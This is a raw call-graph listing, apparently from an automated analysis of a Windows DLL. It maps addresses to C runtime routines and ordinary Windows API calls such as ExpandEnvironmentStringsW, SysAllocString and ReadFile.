6f9e974c 13898 6f9e9f7a __DllMainCRTStartup@12 57 API calls 13894->13898 13911 6f9e97f1 __DllMainCRTStartup@12 13894->13911 13895->13894 13902 6f9e97a8 13895->13902 13896->13894 13900 6f9e9776 13896->13900 13896->13910 13897->13910 13898->13910 13901 6f9e7a0a __DllMainCRTStartup@12 34 API calls 13899->13901 13899->13911 13903 6f9ea2b2 __DllMainCRTStartup@12 52 API calls 13900->13903 13900->13911 13901->13910 13902->13887 13904 6f9e97ac 13902->13904 13903->13910 13907 6f9ea3ef __DllMainCRTStartup@12 33 API calls 13904->13907 13904->13911 13905->13856 13906 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13908 6f9e9a6a 13906->13908 13907->13910 13908->13856 13909 6f9ef461 __DllMainCRTStartup@12 52 API calls 13909->13910 13910->13909 13910->13911 13911->13906 13913 6f9e9792 13912->13913 13914 6f9e9732 13912->13914 13915 6f9e97cb 13913->13915 13916 6f9e9797 13913->13916 13917 6f9e97b8 13914->13917 13918 6f9e9738 13914->13918 13919 6f9e97e8 13915->13919 13920 6f9e97d0 13915->13920 13921 6f9e9799 13916->13921 13922 6f9e97c4 13916->13922 13926 6f9e76eb __DllMainCRTStartup@12 34 API calls 13917->13926 13928 6f9e9789 13918->13928 13929 6f9e973d 13918->13929 13925 6f9ea4ae __DllMainCRTStartup@12 34 API calls 13919->13925 13920->13917 13920->13928 13939 6f9e9763 __DllMainCRTStartup@12 13920->13939 13924 6f9e974c 13921->13924 13930 6f9e97a8 13921->13930 13923 6f9ea474 __DllMainCRTStartup@12 34 API calls 13922->13923 13923->13939 13927 6f9e9f7a __DllMainCRTStartup@12 57 API calls 13924->13927 13940 6f9e97f1 __DllMainCRTStartup@12 13924->13940 13925->13939 13926->13939 13927->13939 13932 6f9e7a0a __DllMainCRTStartup@12 34 API calls 13928->13932 13928->13940 13929->13924 13931 6f9e9776 13929->13931 13929->13939 13930->13917 13933 6f9e97ac 13930->13933 13934 6f9ea2b2 __DllMainCRTStartup@12 52 API calls 13931->13934 13931->13940 13932->13939 13936 6f9ea3ef __DllMainCRTStartup@12 33 API calls 13933->13936 13933->13940 13934->13939 13935 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13937 6f9e9a6a 13935->13937 13936->13939 13937->13856 13938 6f9ef461 __DllMainCRTStartup@12 52 API calls 13938->13939 13939->13938 13939->13940 13940->13935 13942 6f9eaad0 __fread_nolock 13941->13942 13947 6f9e6930 13942->13947 13945 6f9e609e __fread_nolock 50 API calls 13946 6f9e1047 13945->13946 13946->13702 13948 6f9e695f 13947->13948 13949 6f9e693c 13947->13949 13950 6f9e6986 13948->13950 13955 6f9e670e 13948->13955 13951 6f9ec1f9 __fread_nolock 33 API calls 13949->13951 13952 6f9e6957 13950->13952 13954 6f9ec1f9 __fread_nolock 33 API calls 13950->13954 13951->13952 13952->13945 13954->13952 13956 6f9e675d 13955->13956 13957 6f9e673a 13955->13957 13956->13957 13960 6f9e6765 __DllMainCRTStartup@12 13956->13960 13958 6f9ec1f9 __fread_nolock 33 API calls 13957->13958 13964 6f9e6752 13958->13964 13959 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 13961 6f9e688f 13959->13961 13966 6f9e8d4f 13960->13966 13961->13950 13963 6f9e847f __DllMainCRTStartup@12 17 API calls 13963->13964 13964->13959 13967 6f9ea71e __DllMainCRTStartup@12 33 API calls 13966->13967 13973 6f9e8d64 __DllMainCRTStartup@12 13967->13973 13968 6f9e67e6 13968->13963 13969 6f9e8d6f 13970 6f9ec1f9 __fread_nolock 33 API calls 13969->13970 13970->13968 13973->13968 13973->13969 13975 6f9e8741 13973->13975 13978 6f9e9241 13973->13978 14019 6f9e9a6c 13973->14019 14055 6f9e6ddb 13975->14055 13977 6f9e877e 13977->13973 13979 6f9e924f 13978->13979 13980 6f9e9267 13978->13980 13982 6f9e9a9a 13979->13982 13983 6f9e9b04 13979->13983 14008 6f9e92a8 13979->14008 13981 6f9ec1f9 __fread_nolock 33 API calls 13980->13981 13980->14008 13986 6f9e929c 13981->13986 13987 6f9e9b2c 13982->13987 13988 6f9e9aa0 13982->13988 13984 6f9e9b09 13983->13984 13985 6f9e9b43 13983->13985 13989 6f9e9b3a 13984->13989 13990 6f9e9b0b 13984->13990 13991 6f9e9b48 13985->13991 13992 6f9e9b62 13985->13992 13986->13973 14092 6f9e7878 13987->14092 13993 6f9e9aa5 13988->13993 13994 6f9e9ad1 13988->13994 14099 6f9ea491 13989->14099 14000 6f9e9ab3 13990->14000 14007 6f9e9b1a 13990->14007 13997 6f9e9b4d 13991->13997 13998 6f9e9b59 13991->13998 14107 6f9ea4c4 13992->14107 13993->13998 14001 6f9e9aab 13993->14001 13994->14001 14003 6f9e9af9 13994->14003 13997->13987 13997->14003 14103 6f9ea54c 13998->14103 14017 6f9e9b6d __DllMainCRTStartup@12 14000->14017 14065 6f9ea10b 14000->14065 14001->14000 14005 6f9e9ade 14001->14005 14014 6f9e9acc __DllMainCRTStartup@12 14001->14014 14003->14017 14081 6f9e7b97 14003->14081 14005->14017 14075 6f9ea347 14005->14075 14007->13987 14010 6f9e9b1e 14007->14010 14008->13973 14010->14017 14088 6f9ea3ef 14010->14088 14011 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14012 6f9e9e5e 14011->14012 14012->13973 14015 6f9ea670 __DllMainCRTStartup@12 50 API calls 14014->14015 14014->14017 14018 6f9e9d4d 14014->14018 14015->14018 14017->14011 14018->14017 14110 6f9ef5cb 14018->14110 14020 6f9e9a9a 14019->14020 14021 6f9e9b04 14019->14021 14024 6f9e9b2c 14020->14024 14025 6f9e9aa0 14020->14025 14022 6f9e9b09 14021->14022 14023 6f9e9b43 14021->14023 14026 6f9e9b3a 14022->14026 14027 6f9e9b0b 14022->14027 14028 6f9e9b48 14023->14028 14029 6f9e9b62 14023->14029 14032 6f9e7878 __DllMainCRTStartup@12 34 API calls 14024->14032 14030 6f9e9aa5 14025->14030 14031 6f9e9ad1 14025->14031 14033 6f9ea491 __DllMainCRTStartup@12 34 API calls 14026->14033 14034 6f9e9ab3 14027->14034 14044 6f9e9b1a 14027->14044 14035 6f9e9b4d 14028->14035 14036 6f9e9b59 14028->14036 14037 6f9ea4c4 __DllMainCRTStartup@12 34 API calls 14029->14037 14030->14036 14038 6f9e9aab 14030->14038 14031->14038 14040 6f9e9af9 14031->14040 14050 6f9e9acc __DllMainCRTStartup@12 14032->14050 14033->14050 14039 6f9ea10b __DllMainCRTStartup@12 57 API calls 14034->14039 14053 6f9e9b6d __DllMainCRTStartup@12 14034->14053 14035->14024 14035->14040 14041 6f9ea54c __DllMainCRTStartup@12 50 API calls 14036->14041 14037->14050 14038->14034 14042 6f9e9ade 14038->14042 14038->14050 14039->14050 14043 6f9e7b97 __DllMainCRTStartup@12 34 API calls 14040->14043 14040->14053 14041->14050 14046 6f9ea347 __DllMainCRTStartup@12 51 API calls 14042->14046 14042->14053 14043->14050 14044->14024 14045 6f9e9b1e 14044->14045 14049 6f9ea3ef __DllMainCRTStartup@12 33 API calls 14045->14049 14045->14053 14046->14050 14047 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14048 6f9e9e5e 14047->14048 14048->13973 14049->14050 14051 6f9ea670 __DllMainCRTStartup@12 50 API calls 14050->14051 14050->14053 14054 6f9e9d4d 14050->14054 14051->14054 14052 6f9ef5cb __wsopen_s 51 API calls 14052->14054 14053->14047 14054->14052 14054->14053 14056 6f9ea6cb __DllMainCRTStartup@12 50 API calls 14055->14056 14058 6f9e6df1 14056->14058 14057 6f9e6e06 14059 6f9ec1f9 __fread_nolock 33 API calls 14057->14059 14058->14057 14061 6f9e6e39 14058->14061 14064 6f9e6e21 __DllMainCRTStartup@12 14058->14064 14059->14064 14060 6f9e7138 14062 6f9ea63e __DllMainCRTStartup@12 50 API calls 14060->14062 14061->14060 14063 6f9ea63e __DllMainCRTStartup@12 50 API calls 14061->14063 14062->14064 14063->14060 14064->13977 14066 6f9ea12c 14065->14066 14067 6f9e69fb __DllMainCRTStartup@12 18 API calls 14066->14067 14068 6f9ea16e __DllMainCRTStartup@12 14067->14068 14069 6f9ef2e0 __DllMainCRTStartup@12 56 API calls 14068->14069 14070 6f9ea201 14069->14070 14071 6f9ea670 __DllMainCRTStartup@12 50 API calls 14070->14071 14072 6f9ea224 __DllMainCRTStartup@12 14070->14072 14071->14072 14073 6f9ea670 __DllMainCRTStartup@12 50 API calls 14072->14073 14074 6f9ea260 __DllMainCRTStartup@12 14072->14074 14073->14074 14074->14014 14074->14074 14076 6f9ea374 __DllMainCRTStartup@12 14075->14076 14077 6f9ea3b1 14076->14077 14078 6f9ea390 14076->14078 14079 6f9ea670 __DllMainCRTStartup@12 50 API calls 14076->14079 14077->14014 14080 6f9ef5cb __wsopen_s 51 API calls 14078->14080 14079->14078 14080->14077 14082 6f9e7bac __DllMainCRTStartup@12 14081->14082 14083 6f9e7bce 14082->14083 14085 6f9e7bf5 14082->14085 14084 6f9ec1f9 __fread_nolock 33 API calls 14083->14084 14087 6f9e7beb __DllMainCRTStartup@12 14084->14087 14086 6f9e6a7c __DllMainCRTStartup@12 18 API calls 14085->14086 14085->14087 14086->14087 14087->14014 14090 6f9ea405 __DllMainCRTStartup@12 14088->14090 14089 6f9ec1f9 __fread_nolock 33 API calls 14091 6f9ea426 14089->14091 14090->14089 14090->14091 14091->14014 14093 6f9e788d __DllMainCRTStartup@12 14092->14093 14094 6f9e78af 14093->14094 14096 6f9e78d6 14093->14096 14095 6f9ec1f9 __fread_nolock 33 API calls 14094->14095 14098 6f9e78cc __DllMainCRTStartup@12 14095->14098 14097 6f9e6a7c __DllMainCRTStartup@12 18 API calls 14096->14097 14096->14098 14097->14098 14098->14014 14100 6f9ea49d 14099->14100 14101 6f9e7559 __DllMainCRTStartup@12 34 API calls 14100->14101 14102 6f9ea4ad 14101->14102 14102->14014 14104 6f9ea569 __DllMainCRTStartup@12 14103->14104 14105 6f9ea5c0 __DllMainCRTStartup@12 50 API calls 14104->14105 14106 6f9ea587 __DllMainCRTStartup@12 14104->14106 14105->14106 14106->14014 14108 6f9e7b97 __DllMainCRTStartup@12 34 API calls 14107->14108 14109 6f9ea4d9 14108->14109 14109->14014 14111 6f9ef5df 14110->14111 14119 6f9ef5ef 14110->14119 14112 6f9ef614 14111->14112 14113 6f9ea670 __DllMainCRTStartup@12 50 API calls 14111->14113 14111->14119 14114 6f9ef648 14112->14114 14115 6f9ef625 14112->14115 14113->14112 14117 6f9ef6c4 14114->14117 14118 6f9ef670 14114->14118 14114->14119 14116 6f9f5b7c __wsopen_s 5 API calls 14115->14116 14116->14119 14120 6f9f2c0b __fread_nolock MultiByteToWideChar 14117->14120 14118->14119 14121 6f9f2c0b __fread_nolock MultiByteToWideChar 14118->14121 14119->14018 14120->14119 14121->14119 14123 6f9e12a3 GetModuleHandleW 14122->14123 14123->13740 14125 6f9e1a18 14124->14125 14126 6f9e2472 14124->14126 14125->13787 14243 6f9e2529 14126->14243 14129 6f9e2411 14128->14129 14130 6f9e2463 14129->14130 14133 6f9e241e __DllMainCRTStartup@12 14129->14133 14274 6f9e119f 14130->14274 14135 6f9e2425 __fread_nolock 14133->14135 14253 6f9e2711 14133->14253 14135->13806 14137 6f9e1d7b 14136->14137 14138 6f9e1d63 14136->14138 14140 6f9e23ec __DllMainCRTStartup@12 52 API calls 14137->14140 14330 6f9e1053 14138->14330 14142 6f9e1d8a ExpandEnvironmentStringsW 14140->14142 14144 6f9e1dbe __DllMainCRTStartup@12 14142->14144 14143 6f9e2329 14145 6f9e2469 __DllMainCRTStartup@12 50 API calls 14143->14145 14334 6f9e248f 14144->14334 14146 6f9e2334 14145->14146 14148 6f9e2469 __DllMainCRTStartup@12 50 API calls 14146->14148 14150 6f9e233f 14148->14150 14149 6f9e1dcc VariantInit VariantInit VariantInit VariantInit 14151 6f9e1e4f VariantClear VariantClear VariantClear VariantClear 14149->14151 14152 6f9e2469 __DllMainCRTStartup@12 50 API calls 14150->14152 14153 6f9e1e8c 14151->14153 14154 6f9e1e77 14151->14154 14155 6f9e234a 14152->14155 14344 6f9e11aa 14153->14344 14158 6f9e1053 __DllMainCRTStartup@12 85 API calls 14154->14158 14157 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14155->14157 14159 6f9e2367 14157->14159 14172 6f9e1e82 CoUninitialize 14158->14172 14159->13806 14161 6f9e1e9e 14353 6f9e1216 14161->14353 14163 6f9e2469 __DllMainCRTStartup@12 50 API calls 14163->14143 14164 6f9e1ecc 14164->14154 14165 6f9e1ed8 14164->14165 14166 6f9e1f0d 14165->14166 14167 6f9e1ef8 14165->14167 14169 6f9e1f21 14166->14169 14170 6f9e11aa __DllMainCRTStartup@12 54 API calls 14166->14170 14168 6f9e1053 __DllMainCRTStartup@12 85 API calls 14167->14168 14168->14172 14171 6f9e1053 __DllMainCRTStartup@12 85 API calls 14169->14171 14173 6f9e1f39 14170->14173 14171->14172 14205 6f9e2303 14172->14205 14174 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14173->14174 14175 6f9e1f61 14174->14175 14175->14169 14176 6f9e11aa __DllMainCRTStartup@12 54 API calls 14175->14176 14177 6f9e2057 14176->14177 14178 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14177->14178 14179 6f9e207f 14178->14179 14180 6f9e208e 14179->14180 14181 6f9e1053 __DllMainCRTStartup@12 85 API calls 14179->14181 14182 6f9e11aa __DllMainCRTStartup@12 54 API calls 14180->14182 14181->14180 14183 6f9e20ad 14182->14183 14184 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14183->14184 14185 6f9e20d5 14184->14185 14185->14169 14186 6f9e11aa __DllMainCRTStartup@12 54 API calls 14185->14186 14187 6f9e2179 14186->14187 14188 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14187->14188 14189 6f9e219f 14188->14189 14190 6f9e11aa __DllMainCRTStartup@12 54 API calls 14189->14190 14191 6f9e21bc 14190->14191 14192 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14191->14192 14193 6f9e21e4 14192->14193 14193->14169 14194 6f9e21fc SysAllocString 14193->14194 14195 6f9e236f 14194->14195 14196 6f9e221c VariantInit VariantInit 14194->14196 14357 6f9e2c70 mydllmain 14195->14357 14198 6f9e11aa __DllMainCRTStartup@12 54 API calls 14196->14198 14200 6f9e225f 14198->14200 14201 6f9e1216 __DllMainCRTStartup@12 SysFreeString 14200->14201 14205->14163 14207 6f9eb924 14206->14207 14208 6f9eb912 GetLastError 14206->14208 14207->13810 14421 6f9ee757 14208->14421 14429 6f9eb0ab 14211->14429 14216 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14218 6f9e1cf6 14216->14218 14218->13785 14222 6f9eb0ab __DllMainCRTStartup@12 54 API calls 14223 6f9e1ac7 ___std_exception_copy 14222->14223 14457 6f9ebf16 14223->14457 14225 6f9e1aea __DllMainCRTStartup@12 14460 6f9eae5d 14225->14460 14229 6f9e1b33 14229->14216 14244 6f9e254d __DllMainCRTStartup@12 14243->14244 14245 6f9e253d 14243->14245 14244->14125 14245->14244 14248 6f9ec286 14245->14248 14249 6f9ec1c2 __fread_nolock 50 API calls 14248->14249 14250 6f9ec295 14249->14250 14251 6f9ec2a3 __wsopen_s 11 API calls 14250->14251 14252 6f9ec2a2 14251->14252 14254 6f9e271f 14253->14254 14255 6f9e275a 14253->14255 14256 6f9e2728 14254->14256 14257 6f9e2747 14254->14257 14290 6f9e1152 14255->14290 14256->14255 14260 6f9e272f 14256->14260 14261 6f9e273c 14257->14261 14264 6f9e2e58 __DllMainCRTStartup@12 52 API calls 14257->14264 14259 6f9e2735 14259->14261 14262 6f9ec286 __DllMainCRTStartup@12 50 API calls 14259->14262 14277 6f9e2e58 14260->14277 14261->14135 14265 6f9e2764 14262->14265 14264->14261 14266 6f9e277d __DllMainCRTStartup@12 14265->14266 14267 6f9e27e3 14265->14267 14270 6f9e2711 __DllMainCRTStartup@12 52 API calls 14266->14270 14268 6f9e119f __DllMainCRTStartup@12 52 API calls 14267->14268 14269 6f9e27e8 14268->14269 14271 6f9e279e __DllMainCRTStartup@12 14270->14271 14272 6f9e2529 __DllMainCRTStartup@12 50 API calls 14271->14272 14273 6f9e27cc __DllMainCRTStartup@12 14271->14273 14272->14273 14273->14135 14319 6f9e2c4d 14274->14319 14278 6f9e2e5d ___std_exception_copy 14277->14278 14279 6f9e2e77 14278->14279 14280 6f9ec30c __dosmaperr 3 API calls 14278->14280 14281 6f9e2e79 14278->14281 14279->14259 14280->14278 14282 6f9e1152 Concurrency::cancel_current_task 14281->14282 14283 6f9e2e83 __DllMainCRTStartup@12 14281->14283 14296 6f9e47d6 14282->14296 14286 6f9e47d6 CallUnexpected 2 API calls 14283->14286 14285 6f9e116e 14301 6f9e10c8 14285->14301 14288 6f9e338f 14286->14288 14291 6f9e1160 Concurrency::cancel_current_task 14290->14291 14292 6f9e47d6 CallUnexpected 2 API calls 14291->14292 14293 6f9e116e 14292->14293 14294 6f9e10c8 std::bad_exception::bad_exception 50 API calls 14293->14294 14295 6f9e117b 14294->14295 14295->14259 14297 6f9e481d RaiseException 14296->14297 14298 6f9e47f0 14296->14298 14297->14285 14299 6f9e47f5 mydllmain 14298->14299 14300 6f9e480e 14298->14300 14299->14300 14300->14297 14304 6f9e3ece 14301->14304 14305 6f9e3edb ___std_exception_copy 14304->14305 14309 6f9e10e9 14304->14309 14306 6f9e3f08 14305->14306 14305->14309 14310 6f9ed105 14305->14310 14308 6f9eb928 ___vcrt_freefls@4 17 API calls 14306->14308 14308->14309 14309->14259 14311 6f9ed121 14310->14311 14312 6f9ed113 14310->14312 14313 6f9ee7b1 __dosmaperr 17 API calls 14311->14313 14312->14311 14317 6f9ed139 14312->14317 14314 6f9ed129 14313->14314 14316 6f9ec276 __fread_nolock 50 API calls 14314->14316 14315 6f9ed133 14315->14306 14316->14315 14317->14315 14318 6f9ee7b1 __dosmaperr 17 API calls 14317->14318 14318->14314 14324 6f9e2be6 14319->14324 14322 6f9e47d6 CallUnexpected 2 API calls 14323 6f9e2c6c 14322->14323 14327 6f9e2b96 14324->14327 14328 6f9e3ece ___std_exception_copy 50 API calls 14327->14328 14329 6f9e2bc2 14328->14329 14329->14322 14331 6f9e105f __DllMainCRTStartup@12 14330->14331 14359 6f9ea9d7 14331->14359 14335 6f9e24cb 14334->14335 14342 6f9e24aa __fread_nolock 14334->14342 14336 6f9e2523 14335->14336 14337 6f9e24d3 __DllMainCRTStartup@12 14335->14337 14338 6f9e119f __DllMainCRTStartup@12 52 API calls 14336->14338 14340 6f9e2711 __DllMainCRTStartup@12 52 API calls 14337->14340 14339 6f9e2528 14338->14339 14341 6f9e24e6 __fread_nolock 14340->14341 14341->14342 14343 6f9e2529 __DllMainCRTStartup@12 50 API calls 14341->14343 14342->14149 14343->14342 14345 6f9e11b6 __EH_prolog3 14344->14345 14346 6f9e2e58 __DllMainCRTStartup@12 52 API calls 14345->14346 14347 6f9e11bf 14346->14347 14348 6f9e11cd SysAllocString 14347->14348 14349 6f9e11ee 14347->14349 14348->14349 14350 6f9e1201 __DllMainCRTStartup@12 14349->14350 14351 6f9e2c70 __DllMainCRTStartup@12 mydllmain 14349->14351 14350->14161 14352 6f9e1215 14351->14352 14354 6f9e1221 14353->14354 14356 6f9e1233 __DllMainCRTStartup@12 14353->14356 14354->14356 14418 6f9e1244 14354->14418 14356->14164 14358 6f9e2379 14357->14358 14360 6f9ea9eb __fread_nolock 14359->14360 14361 6f9eaa0d 14360->14361 14363 6f9eaa34 14360->14363 14362 6f9ec1f9 __fread_nolock 33 API calls 14361->14362 14364 6f9eaa28 14362->14364 14368 6f9e653f 14363->14368 14366 6f9e609e __fread_nolock 50 API calls 14364->14366 14367 6f9e1078 CoUninitialize 14366->14367 14367->14143 14369 6f9e654b __FrameHandler3::FrameUnwindToState 14368->14369 14376 6f9eafcd EnterCriticalSection 14369->14376 14371 6f9e6559 14377 6f9e84bd 14371->14377 14376->14371 14391 6f9ef77e 14377->14391 14379 6f9e84e4 __DllMainCRTStartup@12 14398 6f9e87bb 14379->14398 14382 6f9e847f __DllMainCRTStartup@12 17 API calls 14383 6f9e8538 14382->14383 14413 6f9ef829 14383->14413 14386 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14387 6f9e6566 14386->14387 14388 6f9e658e 14387->14388 14417 6f9eafe1 LeaveCriticalSection 14388->14417 14390 6f9e6577 14390->14364 14392 6f9ef740 __DllMainCRTStartup@12 50 API calls 14391->14392 14394 6f9ef78f __DllMainCRTStartup@12 14392->14394 14393 6f9ef7f1 14393->14379 14394->14393 14395 6f9ee7fe __fread_nolock 18 API calls 14394->14395 14396 6f9ef7e8 14395->14396 14397 6f9ee7c4 ___free_lconv_mon 17 API calls 14396->14397 14397->14393 14399 6f9ea6e6 __DllMainCRTStartup@12 50 API calls 14398->14399 14400 6f9e87d6 14399->14400 14401 6f9e87e1 14400->14401 14403 6f9e852b 14400->14403 14408 6f9e8809 __DllMainCRTStartup@12 14400->14408 14402 6f9ec1f9 __fread_nolock 33 API calls 14401->14402 14402->14403 14403->14382 14404 6f9e93cb __DllMainCRTStartup@12 59 API calls 14404->14408 14405 6f9e8f8f __DllMainCRTStartup@12 59 API calls 14405->14408 14406 6f9ea670 __DllMainCRTStartup@12 50 API calls 14406->14408 14407 6f9e86c9 __DllMainCRTStartup@12 50 API calls 14407->14408 14408->14403 14408->14404 14408->14405 14408->14406 14408->14407 14409 6f9e89fd 14408->14409 14410 6f9ec1f9 __fread_nolock 33 API calls 14409->14410 14411 6f9e8a17 14410->14411 14412 6f9ec1f9 __fread_nolock 33 API calls 14411->14412 14412->14403 14414 6f9ef834 14413->14414 14415 6f9e8545 14413->14415 14414->14415 14416 6f9f00d8 ___scrt_uninitialize_crt 75 API calls 14414->14416 14415->14386 14416->14415 14417->14390 14419 6f9e124c SysFreeString 14418->14419 14420 6f9e1257 14418->14420 14419->14420 14420->14356 14426 6f9ee79e 14421->14426 14423 6f9ee762 __dosmaperr 14424 6f9ee7b1 __dosmaperr 17 API calls 14423->14424 14425 6f9eb91e 14424->14425 14425->13810 14427 6f9ed968 __dosmaperr 17 API calls 14426->14427 14428 6f9ee7a3 14427->14428 14428->14423 14430 6f9eb0b8 14429->14430 14431 6f9eb0c9 14429->14431 14433 6f9ee7b1 __dosmaperr 17 API calls 14430->14433 14472 6f9eaff5 14431->14472 14435 6f9eb0bd 14433->14435 14436 6f9ec276 __fread_nolock 50 API calls 14435->14436 14438 6f9e1a7f 14436->14438 14437 6f9ee7b1 __dosmaperr 17 API calls 14437->14438 14438->14229 14439 6f9eb530 14438->14439 14440 6f9eb543 __fread_nolock 14439->14440 14523 6f9eb2c1 14440->14523 14443 6f9e609e __fread_nolock 50 API calls 14444 6f9e1a98 14443->14444 14445 6f9e650f 14444->14445 14446 6f9e6522 __fread_nolock 14445->14446 14567 6f9e5e03 14446->14567 14449 6f9e609e __fread_nolock 50 API calls 14450 6f9e1aa1 14449->14450 14451 6f9eb217 14450->14451 14452 6f9eb22a __fread_nolock 14451->14452 14621 6f9eb0f2 14452->14621 14454 6f9eb236 14455 6f9e609e __fread_nolock 50 API calls 14454->14455 14456 6f9e1ab0 14455->14456 14456->14222 14670 6f9ebf33 14457->14670 14461 6f9eae71 __fread_nolock __DllMainCRTStartup@12 14460->14461 14813 6f9eab3e 14461->14813 14463 6f9eae92 14464 6f9e609e __fread_nolock 50 API calls 14463->14464 14465 6f9e1b23 14464->14465 14475 6f9eb001 __FrameHandler3::FrameUnwindToState 14472->14475 14473 6f9eb008 14474 6f9ee7b1 __dosmaperr 17 API calls 14473->14474 14476 6f9eb00d 14474->14476 14475->14473 14477 6f9eb02a 14475->14477 14478 6f9ec276 __fread_nolock 50 API calls 14476->14478 14479 6f9eb02f 14477->14479 14480 6f9eb03c 14477->14480 14483 6f9eb018 14478->14483 14481 6f9ee7b1 __dosmaperr 17 API calls 14479->14481 14489 6f9f01ef 14480->14489 14481->14483 14483->14437 14483->14438 14485 6f9eb04b 14487 6f9ee7b1 __dosmaperr 17 API calls 14485->14487 14486 6f9eb058 __DllMainCRTStartup@12 14497 6f9eb094 14486->14497 14487->14483 14490 6f9f01fb __FrameHandler3::FrameUnwindToState 14489->14490 14501 6f9f189f EnterCriticalSection 14490->14501 14492 6f9f0209 14502 6f9f0293 14492->14502 14498 6f9eb098 __DllMainCRTStartup@12 14497->14498 14522 6f9eafe1 LeaveCriticalSection 14498->14522 14500 6f9eb0a9 14500->14483 14501->14492 14509 6f9f02b6 14502->14509 14503 6f9f030e 14504 6f9ef9d8 __dosmaperr 17 API calls 14503->14504 14506 6f9f0317 14504->14506 14507 6f9ee7c4 ___free_lconv_mon 17 API calls 14506->14507 14508 6f9f0320 14507->14508 14510 6f9efd31 __wsopen_s 7 API calls 14508->14510 14514 6f9f0216 14508->14514 14509->14503 14509->14509 14509->14514 14518 6f9eafcd EnterCriticalSection 14509->14518 14519 6f9eafe1 LeaveCriticalSection 14509->14519 14511 6f9f033f 14510->14511 14520 6f9eafcd EnterCriticalSection 14511->14520 14515 6f9f024f 14514->14515 14521 6f9f18e7 LeaveCriticalSection 14515->14521 14517 6f9eb045 14517->14485 14517->14486 14518->14509 14519->14509 14520->14514 14521->14517 14522->14500 14526 6f9eb2cd __FrameHandler3::FrameUnwindToState 14523->14526 14524 6f9eb2d3 14525 6f9ec1f9 __fread_nolock 33 API calls 14524->14525 14529 6f9eb2ee 14525->14529 14526->14524 14527 6f9eb316 14526->14527 14534 6f9eafcd EnterCriticalSection 14527->14534 14529->14443 14530 6f9eb322 14535 6f9eb444 14530->14535 14532 6f9eb338 14544 6f9eb361 14532->14544 14534->14530 14536 6f9eb46a 14535->14536 14537 6f9eb457 14535->14537 14547 6f9eb36b 14536->14547 14537->14532 14539 6f9eb51b 14539->14532 14540 6f9eb48d __DllMainCRTStartup@12 14540->14539 14541 6f9f00d8 ___scrt_uninitialize_crt 75 API calls 14540->14541 14542 6f9eb4bb 14541->14542 14551 6f9ed48f 14542->14551 14566 6f9eafe1 LeaveCriticalSection 14544->14566 14546 6f9eb369 14546->14529 14548 6f9eb37c 14547->14548 14550 6f9eb3d4 __DllMainCRTStartup@12 14547->14550 14548->14550 14554 6f9ed44f 14548->14554 14550->14540 14560 6f9ed36e 14551->14560 14553 6f9ed4a8 14553->14539 14555 6f9ed463 __fread_nolock 14554->14555 14556 6f9ed36e __wsopen_s 52 API calls 14555->14556 14557 6f9ed478 14556->14557 14558 6f9e609e __fread_nolock 50 API calls 14557->14558 14559 6f9ed487 14558->14559 14559->14550 14561 6f9f365e __wsopen_s 50 API calls 14560->14561 14562 6f9ed380 14561->14562 14563 6f9ed39c SetFilePointerEx 14562->14563 14565 6f9ed388 __wsopen_s 14562->14565 14564 6f9ed3b4 GetLastError 14563->14564 14563->14565 14564->14565 14565->14553 14566->14546 14568 6f9e5e0f __FrameHandler3::FrameUnwindToState 14567->14568 14569 6f9e5e16 14568->14569 14570 6f9e5e37 14568->14570 14571 6f9ec1f9 __fread_nolock 33 API calls 14569->14571 14578 6f9eafcd EnterCriticalSection 14570->14578 14573 6f9e5e2f 14571->14573 14573->14449 14574 6f9e5e42 14579 6f9e5e83 14574->14579 14578->14574 14585 6f9e5eb5 14579->14585 14581 6f9e5e51 14582 6f9e5e79 14581->14582 14620 6f9eafe1 LeaveCriticalSection 14582->14620 14584 6f9e5e81 14584->14573 14586 6f9e5eec 14585->14586 14587 6f9e5ec4 14585->14587 14589 6f9ed222 __fread_nolock 50 API calls 14586->14589 14588 6f9ec1f9 __fread_nolock 33 API calls 14587->14588 14597 6f9e5edf __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14588->14597 14590 6f9e5ef5 14589->14590 14598 6f9ed431 14590->14598 14593 6f9e5f9f 14601 6f9e62a5 14593->14601 14595 6f9e5fb6 __DllMainCRTStartup@12 14595->14597 14613 6f9e60da 14595->14613 14597->14581 14599 6f9ed249 __DllMainCRTStartup@12 54 API calls 14598->14599 14600 6f9e5f13 14599->14600 14600->14593 14600->14595 14600->14597 14602 6f9e62b4 __wsopen_s 14601->14602 14603 6f9ed222 __fread_nolock 50 API calls 14602->14603 14604 6f9e62d0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 14603->14604 14606 6f9ed431 __DllMainCRTStartup@12 54 API calls 14604->14606 14612 6f9e62dc 14604->14612 14605 6f9e2e45 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 14607 6f9e644e 14605->14607 14608 6f9e6330 14606->14608 14607->14597 14609 6f9e6362 ReadFile 14608->14609 14608->14612 14610 6f9e6389 14609->14610 14609->14612 14611 6f9ed431 __DllMainCRTStartup@12 54 API calls 14610->14611 14611->14612 14612->14605 14614 6f9ed222 __fread_nolock 50 API calls 14613->14614 14615 6f9e60ed 14614->14615 14616 6f9e6137 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __DllMainCRTStartup@12 14615->14616 14617 6f9ed431 __DllMainCRTStartup@12 54 API calls 14615->14617 14616->14597 14618 6f9e6194 14617->14618 14618->14616 14619 6f9ed431 __DllMainCRTStartup@12 54 API calls 14618->14619 14619->14616 14620->14584 14622 6f9eb0fe __FrameHandler3::FrameUnwindToState 14621->14622 14623 6f9eb12b 14622->14623 14624 6f9eb108 